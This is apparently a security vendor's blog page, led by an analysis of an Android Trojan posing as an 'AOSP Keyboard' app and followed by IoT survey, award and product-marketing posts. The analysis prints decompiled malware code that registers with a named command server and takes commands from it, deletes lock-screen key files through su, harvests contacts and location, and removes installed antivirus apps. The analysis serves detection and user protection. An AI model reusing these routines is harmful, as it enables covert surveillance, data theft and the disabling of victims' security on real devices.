A Trojan Disguised as a Keyboard App

A Trojan disguised as a keyboard app performs various operations on a user’s device

Trustlook Labs discovered a Trojan taking advantage of the “su” command in a rooted Android device to perform malicious activities. The Trojan makes its way on to a device as a fake keyboard app named “AOSP keyboard.” Once the user executes the app, the malware removes its own icon from the user’s device.

The malware has the following characteristics:

  • MD5:
  • SHA256: 92bddb85ec6e94fc9dd4a0f62ec5a1fc7637c75f55e5b7507b74d29ecac065d5
  • Size: 275621 bytes
  • App name: AOSP Keyboard
  • Package name: com.android.classic

The package icon is:

image001

public boolean isOnline() {
        NetworkInfo netInfo = ((ConnectivityManager) getSystemService("connectivity")).getActiveNetworkInfo();
        if (netInfo == null || !netInfo.isConnected()) {
            return false;
        }
        return true;
    }

    public int onStartCommand(Intent intent, int flags, int startId) {
        try {
            threadPolicy();
            if (Constants.DEBUG) {
                SH.run("echo 'started Service' > /sdcard/Android/data/SystemLogs/Logger/bootup.txt");
            }
            setupAll();
            if (intent.getBooleanExtra("screen_state", false)) {
                screenOff();
            } else {
                screenOn();
            }
[...]
    private void screenOn() throws InterruptedException {
        if (Constants.DEBUG) {
            SH.run("echo 'Screen On' > /sdcard/Android/data/SystemLogs/Logger/bootup.txt");
        }
        doAll();
    }

The malware first registers the device to the remote server:

private void checkDevice() {
        if (Constants.DEBUG) {
            SH.run("echo 'check Device' > /sdcard/Android/data/SystemLogs/Logger/bootup.txt");
        }
        new AsyncTask<Void, Void, Void>() {
            protected Void doInBackground(Void... params) {
                HttpClient httpClient = new DefaultHttpClient();
                String man2 = Build.MANUFACTURER.replaceAll("\\s+", "");
                String rel = VERSION.RELEASE.replace("\\s+", "");
                HttpPost httpPost = new HttpPost("http://www.asds.esy.es/androidcp/device/checkdevice");
                BasicNameValuePair usernameBasicNameValuePair = new BasicNameValuePair("did", new StringBuilder(String.valueOf(man2)).append(rel).toString());
                BasicNameValuePair usernameValuePair = new BasicNameValuePair("name", DEBUGSERVICE.name);
                BasicNameValuePair numberValuePair = new BasicNameValuePair("number", DEBUGSERVICE.random);
                List<NameValuePair> nameValuePairList = new ArrayList();
                nameValuePairList.add(usernameBasicNameValuePair);
                nameValuePairList.add(usernameValuePair);
                nameValuePairList.add(numberValuePair);
                try {
                    httpPost.setEntity(new UrlEncodedFormEntity(nameValuePairList));
                    try {
                        httpClient.execute(httpPost);
                    } catch (ClientProtocolException cpe) {
                        cpe.printStackTrace();

The malware then retrieves command instructions from the C&C server “http://www.asds.esy.es“:

private void checkCMD() {
        if (Constants.DEBUG) {
            SH.run("echo 'check CMD' > /sdcard/Android/data/SystemLogs/Logger/bootup.txt");
        }
        new AsyncTask<Void, Void, Void>() {
            protected Void doInBackground(Void... params) {
                HttpClient httpClient = new DefaultHttpClient();
                String rel = VERSION.RELEASE.replace("\\s+", "");
                String man2 = Build.MANUFACTURER.replaceAll("\\s+", "");
                HttpPost httpPost = new HttpPost("http://www.asds.esy.es/androidcp/device/getcommand");
                BasicNameValuePair usernameBasicNameValuePair = new BasicNameValuePair("did", new StringBuilder(String.valueOf(man2)).append(rel).toString());
                BasicNameValuePair usernameValuePair = new BasicNameValuePair("name", DEBUGSERVICE.name);
                BasicNameValuePair numberValuePair = new BasicNameValuePair("number", DEBUGSERVICE.random);
                List<NameValuePair> nameValuePairList = new ArrayList();
                nameValuePairList.add(usernameBasicNameValuePair);
                nameValuePairList.add(usernameValuePair);
                nameValuePairList.add(numberValuePair);
                try {
                    httpPost.setEntity(new UrlEncodedFormEntity(nameValuePairList));
                    try {
                        String response = DEBUGSERVICE.this.entityToString(httpClient.execute(httpPost).getEntity()).trim();
                        for (String element : DEBUGSERVICE.codeList) {
                            Intent intent;
                            if (element.contains(response)) {
                                intent = new Intent(DEBUGSERVICE.this, DEBUG.class);
                                intent.putExtra("command", response);
                                intent.addFlags(268435456);
                                DEBUGSERVICE.this.startActivity(intent);
                                return null;
                            }
                            intent = new Intent(DEBUGSERVICE.this, Response.class);
                            intent.putExtra("command", response);
                            intent.addFlags(268435456);
                            DEBUGSERVICE.this.startActivity(intent);
                        }
[...]

The following are some commands supported by the malware:

  • wipe device
  • wipe external storage
  • remove screen lock patterns/pins/codes
  • install apk
  • take screen snapshot
  • get list of packages
  • record audio
  • take picture from back camera
  • take picture from front camera
  • send file
  • disable adb on the device
  • get contacts
  • get SMS
  • get call logs
  • get browser bookmarks
  • get location information
  • delete Antivirus products

The following code snippets are used to remove the screen lock patterns. The malware utilizes the “su” commands on the rooted device:

SU.run("mount -o rw, remount /data");
                SU.run("mount -o rw, remount /data/system");
                SU.run("mount -o rw, remount /data/system/gesture.key");
                remount = Runtime.getRuntime().exec(new String[]{"su", "-c", "mount -o rw,remount '/data/'"});
                remount1 = Runtime.getRuntime().exec(new String[]{"su", "-c", "mount -o rw,remount /data/system/"});
                pr1 = Runtime.getRuntime().exec(new String[]{"su", "-c", "chmod 0777  /data/"});
                pr2 = Runtime.getRuntime().exec(new String[]{"su", "-c", "chmod 0777  /data/system"});
                Process unlock = Runtime.getRuntime().exec(new String[]{"su", "-c", "rm -rf  /data/system/gesture.key"});
                Process unlock1 = Runtime.getRuntime().exec(new String[]{"su", "-c", "rm -rf  /data/system/gatekeeper.password.key"});
                Process unlock2 = Runtime.getRuntime().exec(new String[]{"su", "-c", "rm -rf  /data/system/gatekeeper.pattern.key"});
                Process unlock3 = Runtime.getRuntime().exec(new String[]{"su", "-c", "rm -rf  /data/system/*.key"});
                remount.waitFor();
                remount1.waitFor();
                pr1.waitFor();
                pr2.waitFor();
                unlock.waitFor();
                unlock1.waitFor();
                unlock2.waitFor();
                unlock3.waitFor();
                SU.run("rm -rf /data/system/*.key");
                SU.run("reboot");

The following code snippets are responsible for getting the contacts from the device:

String vfile = Build.MODEL + "_Contacts_" + date + ".vcf";
                    File file = new File(new StringBuilder(String.valueOf(Environment.getExternalStorageDirectory().getPath())).append("/Android/data/SystemLogs/Contacts/").toString());
                    file.mkdirs();
                    String path = file.getAbsolutePath() + "/" + vfile;
                    Cursor phones = getContentResolver().query(Phone.CONTENT_URI, null, null, null, null);
                    phones.moveToFirst();
                    for (int i = 0; i < phones.getCount(); i++) {
                        try {
                            AssetFileDescriptor fd = getContentResolver().openAssetFileDescriptor(Uri.withAppendedPath(Contacts.CONTENT_VCARD_URI, phones.getString(phones.getColumnIndex("lookup"))), "r");
                            byte[] buf = new byte[((int) fd.getDeclaredLength())];
                            fd.createInputStream().read(buf);
                            String str = new String(buf);
                            new FileOutputStream(path, true).write(str.toString().getBytes());
                            phones.moveToNext();
                        } catch (Exception e1) {
                            e1.printStackTrace();
                        }
                    }				

The malware uses the code shown below to delete any antivirus products:

                } else if (this.commands.equals(DEBUGSERVICE.codeList[38])) {
                    SU.run("mount -o rw, remount /data");
                    SU.run("mount -o rw, remount /data/app");
                    SU.run("mount -o rw,remount '/data/'");
                    SU.run("mount -o rw,remount '/data/app/'");
                    SU.run("chmod 0777 '/data/'");
                    SU.run("chmod 0777 '/data/app/'");
                    SU.run("rm -rf /data/app/com.cleanmaster.mguard*");
                    SU.run("rm -rf  /data/app/com.avast.android.mobilesecurity*");
                    SU.run("rm -rf /data/app/com.qihoo.security*");
                    SU.run("rm -rf  /data/app/com.cleanmaster.security*");
                    SU.run("rm -rf  /data/app/com.zrgiu.antivirus*");
                    SU.run("rm -rf  /data/app/com.avira.android*");
                    SU.run("rm -rf  /data/app/com.symantec.mobilesecurity*");
                    SU.run("rm -rf  /data/app/com.wsandroid.suite*");
                    SU.run("rm -rf  /data/app/com.eset.ems2.gp*");
                    SU.run("rm -rf  /data/app/com.quickheal.platform*");
                    SU.run("rm -rf  /data/app/com.kms.free*");
                    SU.run("rm -rf  /data/app/com.cmsecurity.lite*");
                    SU.run("rm -rf  /data/app/com.k7computing.android.security*");
                    SU.run("rm -rf  /data/app/org.antivirus*");
                    SU.run("rm -rf  /data/app/com.androhelm.antivirus.free2*");
                    SU.run("rm -rf  /data/app/com.lookout*");
                    SU.run("rm -rf  /data/app/org.malwarebytes.antimalware*");
                    SU.run("rm -rf  /data/app/com.cleanmaster.security.stubborntrjkiller*");
                    SU.run("rm -rf  /data/app/com.bitdefender.antivirus*");
                    SU.run("rm -rf  /data/app/com.cmcm.lite*");

The malware uses the following function to get location information:

public Location getLocation() {
        try {
            this.locationManager = (LocationManager) this.mContext.getSystemService("location");
            this.isGPSEnabled = this.locationManager.isProviderEnabled("gps");
            this.isNetworkEnabled = this.locationManager.isProviderEnabled("network");
            Intent intent = new Intent("android.location.GPS_ENABLED_CHANGE");
            intent.putExtra("enabled", true);
            sendBroadcast(intent);
            if (this.isGPSEnabled || this.isNetworkEnabled) {
                this.canGetLocation = true;
                if (this.isNetworkEnabled) {
                    this.locationManager.requestLocationUpdates("network", MIN_TIME_BW_UPDATES, 10.0f, this);
                    if (this.locationManager != null) {
                        this.location = this.locationManager.getLastKnownLocation("network");
                        if (this.location != null) {
                            this.latitude = this.location.getLatitude();
                            this.longitude = this.location.getLongitude();
                        }
                    }
                }
                if (this.isGPSEnabled && this.location == null) {
                    this.locationManager.requestLocationUpdates("gps", MIN_TIME_BW_UPDATES, 10.0f, this);
                    if (this.locationManager != null) {
                        this.location = this.locationManager.getLastKnownLocation("gps");
                        if (this.location != null) {
                            this.latitude = this.location.getLatitude();
                            this.longitude = this.location.getLongitude();
                        }
                    }
                }
                String finalOutput = this.latitude + "|" + this.longitude;
                new Sender().execute(new String[]{"gps", DEBUGSERVICE.name, DEBUGSERVICE.random, finalOutput});
            }

Summary
“Rooting” a device can be very dangerous. It gives user administrative access to the device, which presents obvious drawbacks. First, you void the manufacturer warranty for the device. Second, permission and freedom are increased for malware.

Trustlook was able to gather deep insights and knowledge of the malware behavior of this keyboard app. Trustlook’s anti-threat platform can effectively protect users against this invasion.

Survey Reveals IoT Security is Falling Short

Trustlook has released the findings from an IoT security survey it sent in September 2017. Some responses validated existing beliefs, while others were troubling in terms of how the IoT is secured and understood. For instance, 54 percent of IoT device owners do not use a third-party security tool to protect their devices from outside threats. In addition, more than one-third (35 percent) do not change the default password on their devices, leaving them vulnerable to attacks.

The proliferation of IoT devices in 2017 has been staggering, with 8.4 billion devices currently in use, and a total of 25 billion devices projected by 2020. As the use of these devices continues to increase, so do the associated risks. By 2020, it is estimated that 25% of cyber attacks will target IoT devices.

In the past year, there have been a few notable IoT attacks. In August 2017, hackers were able to gain root access to a vulnerable Amazon Echo and add commands that secretly capture the raw microphone input. And last Fall’s Mirai botnet, which targeted IoT devices, shut down a large part of the Internet.

Some of the findings from the survey include:
▪ 41% own an IoT device, such as a smart refrigerator or fitness tracker
▪ 54% of IoT device owners do not use a third-party security tool
▪ 35% of IoT device owners do not change their default password
▪ 17% know of Mirai, the IoT botnet from Fall 2016 that shut down parts of the Internet
▪ 22% know that there will be 25 billion IoT devices by the year 2020

To view an infographic of the survey findings, please go here. For more information on Trustlook, please visit http://www.trustlook.com.

iot-survey-image

Take our IoT Security Survey for a chance to win $50

The penetration of the IoT (Internet of Things) into our personal and professional lives is continuing to grow at an incredible pace. The benefits are numerous, but there are also risks, with the biggest risk being security. All of these devices increase the attack surface and present new opportunities for hackers to invade our lives.

Trustlook is looking to gather additional information and feedback on what impact the IoT has had on consumers, and how consumers are approaching security with these new devices.

We would greatly appreciate you taking the time to answer a few short questions regarding your IoT experience. Your feedback is important to us. By taking the survey, you will be eligible to win a $50 Amazon.com Gift Card. The winner will be selected on 9/17/17.

We thank you in advance for your feedback. You can take the survey here.

Internet-of-Things

Trustlook Selected as 10 Best Security Service Providers of 2017

Trustlook has been selected by Industry Era magazine as one of the 10 Best Security Service Providers of 2017. This prestigious list honors the most promising technology ventures from across the security landscape. This year’s list includes companies in cloud, network, and IoT security.

“Trustlook is very proud to receive this recognition,” says Allan Zhang, CEO and co-founder of Trustlook. “This is testament to all the hard work we’ve put into our security products over the past year.”

Trustlook focuses extensively on Artificial Intelligence (AI) as the foundation for all their security products, whether their mobile product or IoT product, to process the data they receive to rapidly improve performance. In addition, they rely on their product breadth as another way to stand out. They have products for consumers, app developers, OEMs, systems integrators, and large enterprises. They protect mobile phones, network appliances, and IoT devices. Pretty much anyone looking to build security into an app or computing device can benefit from their technology.

To read the article, please go here. To learn more about Trustlook or to schedule a demo, please visit www.trustlook.com.

trustlook-industry-era-top-10-cybersecurity-provider

Is Your Ransomware Security Solution SAFE?

Ransomware security solutions claim to be many things. Some claim to be fast. Some say they include artificial intelligence (AI). Some point out their accuracy. And others try to illustrate their effectiveness. But only one ransomware security solution can check all the boxes. Only one is smart, accurate, fast, and effective. Only one is, shall we say, SAFE. It’s Trustlook SECUREai Core Ransomware. Let’s look further.

It’s Smart
Trustlook’s proprietary AI engine is built on an advanced machine learning foundation that is constantly improving. Millions of data points have been analyzed to build this intelligent engine.

It’s Accurate
Trustlook’s ransomware detection rates are consistently over 99%, with extremely low false positives of less than 1%.

It’s Fast
Trustlook’s ransomware detection engine processes dozens of files per second, without weighing down the network.

It’s Effective
Trustlook blocks new ransomware threats before files and data are encrypted. Threats are blocked in real-time, eliminating the cost and disruption associated with tackling threats after they’ve already penetrated the network.

Don’t settle for an average ransomware security solution. Ransomware has been identified as the biggest cyber threat of 2017 by the U.S. Department of Justice, and is expected to cost businesses and individuals millions in the coming years.

Trustlook’s ransomware detection is built into its SECUREai Core platform. SECUREai Core provides an additional layer of protection for network appliance makers and cloud service providers. To learn more about Trustlook’s ransomware solution please visit http://www.trustlook.com.

ransomware-safe

Could the Amazon Echo hack have been prevented with proper IoT security?

IoT devices are becoming more popular in homes, and so too are these devices’ security vulnerabilities. The latest concerning example is the hack of the Amazon Echo, the smart speaker capable of voice interaction, music playback, making to-do lists, setting alarms, streaming podcasts, and more.

The hack, which works by gaining root access to a vulnerable Echo and adding commands that secretly capture the raw microphone input and send it to an attacker-controlled computer, shows just how vulnerable consumers can be in the privacy of their own home. Moreover, it highlights the need for consumers to remain vigilant about the products they install, and for IoT developers to have more rigid security assessments of the smart devices they develop.

It’s clear from the Amazon Echo hack, as well as from past IoT security incidents such as Stuxnet and the Target data breach, that all the network and perimeter-based security mechanisms in the world are no match for human error (i.e. phishing) or “evil-maid” attacks, in which a device can be compromised because there is physical access to it. Devices need an additional layer of security that monitors behaviors inside the device.

Enter Trustlook SECUREai IoT – The Guard Inside the Castle
Trustlook SECUREai IoT revolutionizes IoT security with a custom, embeddable engine built on artificial intelligence. SECUREai IoT is a device-behavior-based solution that detects threats that existing perimeter and network-based products fail to stop. SECUREai IoT works at the device level, so it protects an IoT device from the inside. Its device driver monitors hundreds of system calls and network resources to detect anomalies.

The solution assumes that an attacker already has root access, and monitors the device behavior that happens after root access. Because “root” is the starting point, SECUREai IoT can catch malicious activity that has made it past other forms of protection.

In the case of the Amazon Echo hack, SECUREai IoT would have quickly identified the raw microphone data streamed over TCP/IP to a remote service. It’s fine grain kernel-level monitoring of system calls, network and device resources can detect what is normal and abnormal operating behavior.

To learn more about SECUREai IoT, please download the datasheet or contact bd@trustlook.com.

amazon-echo-hack

Download the latest Trustlook cyber security product information

Do you like reading about the latest Artificial Intelligence solutions in cyber security? If so, you are in luck. Trustlook has security solutions for network appliance makers, IoT developers, mobile device manufacturers, and more.

Take a moment and check out the following datasheets, whitepapers, and videos that provide more details on the innovative security solutions that Trustlook is bringing to customers across the globe.

Quick Reading 2-Page Datasheets
SECUREai IoT
SECUREai Core (for network appliance makers)
SECUREai SaaS (for app stores)

Technical Whitepapers
SECUREai Overview
SECUREai Mobile Defend

General Brochure
SECUREai Overview

Video